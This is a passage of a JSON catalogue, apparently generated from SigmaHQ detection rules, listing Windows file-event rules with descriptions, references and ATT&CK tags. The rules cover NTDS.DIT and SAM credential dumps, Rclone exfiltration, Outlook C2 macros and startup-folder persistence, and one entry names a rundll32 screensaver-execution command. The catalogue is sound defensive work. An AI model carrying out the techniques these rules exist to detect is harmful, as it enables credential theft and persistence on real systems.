"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" + ], + "creation_date": "2022/08/24", + "filename": "file_event_win_msdt_autorun.yml", + "author": "Vadim Varganov, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", + "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "value": "NET CLR Binary Execution Usage Log Artifact", + "meta": { + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/11/18", + "filename": "file_event_win_net_cli_artefact.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "value": "Creation Suspicious File In Uncommon AppData Folder", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/08/05", + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", + "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", + "value": "SCR File Write Event", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ], + "creation_date": "2022/04/27", + "filename": "file_event_win_new_src_file.yml", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "The installation of new screen savers." + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", + "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "value": "Persistence Via Notepad++ Plugins", + "meta": { + "refs": [ + "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/06/10", + "filename": "file_event_win_notepad_plus_plus_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins to enhance notepad++ functionality by users" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner", + "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "value": "Suspicious NTDS.DIT Creation", + "meta": { + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/03/11", + "filename": "file_event_win_ntds_dit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + 
"uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", + "value": "Suspicious NTDS Exfil Filename Patterns", + "meta": { + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/03/11", + "filename": "file_event_win_ntds_exfil_tools.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects add-ins that load when Microsoft Word or Excel starts (.wll/.xll are simply .dll fit for Word or Excel).", + "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "value": "Microsoft Office Add-In Loading", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ], + "creation_date": "2020/05/11", + "filename": "file_event_win_office_persistence.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Legitimate add-ins" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a macro file for Outlook.\nGoes with win_outlook_c2_registry_key. 
VbaProject.OTM is explicitly mentioned in T1137.\nParticularly interesting if both events Registry & File Creation happens at the same time.\n", + "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "value": "Outlook C2 Macro Creation", + "meta": { + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_c2_macro_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], + "creation_date": "2021/04/05", + "filename": "file_event_win_outlook_c2_macro_creation.yml", + "author": "@ScoubiMtl", + "level": "medium", + "falsepositive": [ + "User genuinly creates a VB Macro for their email" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of new Outlook form which can contain malicious code", + "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "value": "Outlook Form Installation", + "meta": { + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], + "creation_date": "2021/06/10", + "filename": "file_event_win_outlook_newform.yml", + "author": "Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes creating temp files related to PCRE.NET package", + "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "value": "PCRE.NET Package Temp Files", + "meta": { + "refs": [ + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/10/29", + "filename": "file_event_win_pcre_net_temp_file.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", + "value": "Pingback Backdoor - File", + "meta": { + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ], + "creation_date": "2021/05/05", + "filename": "file_event_win_pingback_backdoor.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of known powershell scripts for exploitation", + "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "value": "Malicious PowerShell Commandlet Names", + "meta": { + "refs": [ + "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/NetSPI/PowerUpSQL", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/nettitude/Invoke-PowerThIEf", + 
"https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2018/04/07", + "filename": "file_event_win_powershell_exploit_scripts.yml", + "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 
2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "value": "PowerShell Writing Startup Shortcuts", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2021/10/24", + "filename": "file_event_win_powershell_startup_shortcuts.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE", + "level": "high", + "falsepositive": [ + "Unknown", + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
+ ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a dump file written by QuarksPwDump password dumper", + "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", + "value": "QuarksPwDump Dump File", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2018/02/10", + "filename": "file_event_win_quarkspw_filedump.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Rclone config file being created", + "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "value": "Rclone Config File Creation", + "meta": { + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2021/05/26", + "filename": "file_event_win_rclone_exec_file.yml", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "level": "high", + "falsepositive": [ + "Legitimate Rclone usage (rare)" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "value": "RedMimicry Winnti Playbook Dropped File", + "meta": { + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + 
], + "creation_date": "2020/06/24", + "filename": "file_event_win_redmimicry_winnti_filedrop.yml", + "author": "Alexander Rausch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "value": "Remote Credential Dump", + "meta": { + "refs": [ + "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/11/16", + "filename": "file_event_win_remote_cred_dump.yml", + "author": "SecurityAura", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. 
Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", + "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "value": "RipZip Attack on Startup Folder", + "meta": { + "refs": [ + "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" + ], + "tags": [ + "attack.t1547", + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "file_event_win_ripzip_attack.yml", + "author": "Greg (rule)", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "value": "SAM Dump File Creation", + "meta": { + "refs": [ + "https://github.com/search?q=CVE-2021-36934", + "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/HuskyHacks/ShadowSteal", + "https://github.com/FireFart/hivenightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2022/02/11", + "filename": "file_event_win_sam_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rare cases of administrative activity" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese 
services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
+ "uuid": "fec96f39-988b-4586-b746-b93d59fd1922",
+ "value": "ScreenConnect Temporary Installation Artefact",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ],
+ "creation_date": "2022/02/13",
+ "filename": "file_event_win_screenconnect_artefact.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.",
+ "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4",
+ "value": "Created Files by Office Applications",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml"
+ ],
+ "tags": [
+ "attack.t1204.002",
+ "attack.execution"
+ ],
+ "creation_date": "2021/08/23",
+ "filename": "file_event_win_script_creation_by_office_using_file_ext.yml",
+ "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a Windows executable that writes files to suspicious folders",
+ "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43",
+ "value": "Windows Shell File Write to Suspicious Folder",
+ "meta": {
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"
+ ],
+ "tags": "No established tags",
+ "creation_date": "2021/11/20",
+ "filename": "file_event_win_shell_write_susp_directory.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects windows executables that writes files with suspicious extensions",
+ "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62",
+ "value": "Windows Binaries Write Suspicious Extensions",
+ "meta": {
+ "refs": [
+ "Internal Research",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml"
+ ],
+ "tags": "No established tags",
+ "creation_date": "2022/08/12",
+ "filename": "file_event_win_shell_write_susp_files_extensions.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.",
+ "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75",
+ "value": "Startup Folder File Write",
+ "meta": {
+ "refs": [
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/12",
+ "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ],
+ "creation_date": "2020/05/02",
+ "filename": "file_event_win_startup_folder_file_write.yml",
+ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
+ "level": "medium",
+ "falsepositive": [
+ "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the usage of ADSI (LDAP) operations by tools. 
This may also detect tools like LDAPFragger.",
+ "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb",
+ "value": "Suspicious ADSI-Cache Usage By Unknown Tool",
+ "meta": {
+ "refs": [
+ "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
+ "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
+ "https://github.com/fox-it/LDAPFragger",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml"
+ ],
+ "tags": [
+ "attack.t1001.003",
+ "attack.command_and_control"
+ ],
+ "creation_date": "2019/03/24",
+ "filename": "file_event_win_susp_adsi_cache_usage.yml",
+ "author": "xknow @xknow_infosec, Tim Shelton",
+ "level": "high",
+ "falsepositive": [
+ "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc."
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious .NET assembly executions. 
Could detect using Cobalt Strike's command execute-assembly.",
+ "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263",
+ "value": "Suspicious CLR Logs Creation",
+ "meta": {
+ "refs": [
+ "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
+ "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
+ "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.t1059.001",
+ "attack.t1218"
+ ],
+ "creation_date": "2020/10/12",
+ "filename": "file_event_win_susp_clr_logs.yml",
+ "author": "omkar72, oscd.community, Wojciech Lesicki",
+ "level": "high",
+ "falsepositive": [
+ "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\",
+ "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18",
+ "value": "Suspicious Creation with Colorcpl",
+ "meta": {
+ "refs": [
+ "https://twitter.com/eral4m/status/1480468728324231172?s=20",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564"
+ ],
+ "creation_date": "2022/01/21",
+ "filename": "file_event_win_susp_colorcpl.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)",
+ 
"uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832",
+ "value": "Created Files by Microsoft Sync Center",
+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml"
+ ],
+ "tags": [
+ "attack.t1055",
+ "attack.t1218",
+ "attack.execution",
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/04/28",
+ "filename": "file_event_win_susp_creation_by_mobsync.yml",
+ "author": "elhoim",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder",
+ "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60",
+ "value": "Suspicious Files in Default GPO Folder",
+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml"
+ ],
+ "tags": [
+ "attack.t1036.005",
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/04/28",
+ "filename": "file_event_win_susp_default_gpo_dir_write.yml",
+ "author": "elhoim",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension",
+ "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039",
+ "value": "Suspicious Desktopimgdownldr Target File",
+ "meta": {
+ "refs": [
+ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/",
+ "https://twitter.com/SBousseaden/status/1278977301745741825",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1105"
+ ],
+ "creation_date": "2020/07/03",
+ "filename": "file_event_win_susp_desktopimgdownldr_file.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "False positives depend on scripts and administrative tools used in the monitored environment"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.",
+ "uuid": "81315b50-6b60-4d8f-9928-3466e1022515",
+ "value": "Suspicious desktop.ini Action",
+ "meta": {
+ "refs": [
+ "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.009"
+ ],
+ "creation_date": "2020/03/19",
+ "filename": "file_event_win_susp_desktop_ini.yml",
+ "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)",
+ "level": "medium",
+ "falsepositive": [
+ "Operations performed through Windows SCCM or equivalent",
+ "Read only access list authority"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Ransomware create txt file in the user Desktop",
+ "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11",
+ "value": "Suspicious Creation TXT File in User Desktop",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml"
+ ],
+ "tags": [
+ 
"attack.impact",
+ "attack.t1486"
+ ],
+ "creation_date": "2021/12/26",
+ "filename": "file_event_win_susp_desktop_txt.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "file_event",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)",
+ "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a",
+ "value": "Creation of a Diagcab",
+ "meta": {
+ "refs": [
+ "https://threadreaderapp.com/thread/1533879688141086720.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml"
+ ],
+ "tags": [
+ "attack.resource_development"
+ ],
+ "creation_date": "2022/06/08",
